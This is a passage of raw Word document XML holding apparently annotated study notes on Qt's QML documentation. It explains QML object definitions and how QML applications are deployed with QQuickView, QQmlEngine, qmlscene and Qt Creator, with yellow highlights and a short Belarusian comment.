          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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color</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w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// invalid!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This is because a .qml file automatically defines a QML type, which encapsulates a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML object definition. This is discussed further in</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId359" w:history="1">
        <w:r w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Documents as QML object type definitions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00B31BD5" w:rsidRDefault="005A6BBD" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="454" w:name="_Toc483000628"/>
    <w:bookmarkStart w:id="455" w:name="_Toc483003645"/>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>http://doc.qt.io/qt-5/qtquick-deployment.html</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://doc.qt.io/qt-5/qtquick-deployment.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc483603981"/>
      <w:bookmarkStart w:id="457" w:name="_Toc483605201"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deploying QML Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
      <w:bookmarkEnd w:id="455"/>
      <w:bookmarkEnd w:id="456"/>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are loaded and executed</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>includes</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Declarative UI engine</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>built</w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-in QML types and plugin modules</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it also provides </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>access to third-</w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>party</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> QML types and modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007022E0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Applications that use QML </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to invoke the QML runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to execute QML documents. This can be </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>done by creating</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId360" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or a</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId361" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, as described below. In addition, the Declarative UI package includes the </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlscene tool</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which loads</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.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">files. This tool is </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">useful </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for developing and testing QML code without the need to write a C++ application</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to load the QML runtime.</w:t>
      </w:r>
      <w:r w:rsidR="007022E0" w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007022E0" w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>рантайм</w:t>
      </w:r>
      <w:r w:rsidR="007022E0" w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>пампуюць у С++ кодзе</w:t>
      </w:r>
      <w:r w:rsidR="007022E0" w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="deploying-applications-with-qt-creator"/>
      <w:bookmarkStart w:id="459" w:name="_Toc483000629"/>
      <w:bookmarkStart w:id="460" w:name="_Toc483003646"/>
      <w:bookmarkStart w:id="461" w:name="_Toc483603982"/>
      <w:bookmarkStart w:id="462" w:name="_Toc483605202"/>
      <w:bookmarkEnd w:id="458"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deploying Applications with Qt Creator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
      <w:bookmarkEnd w:id="460"/>
      <w:bookmarkEnd w:id="461"/>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="00490E7E" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId362" w:history="1">
        <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Creator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deploys and packages</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> QML applications to </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>various platforms</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For mobile devices, Qt Creator can directly bundle applications to the respective platform package formats such as </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APK</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BAR</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
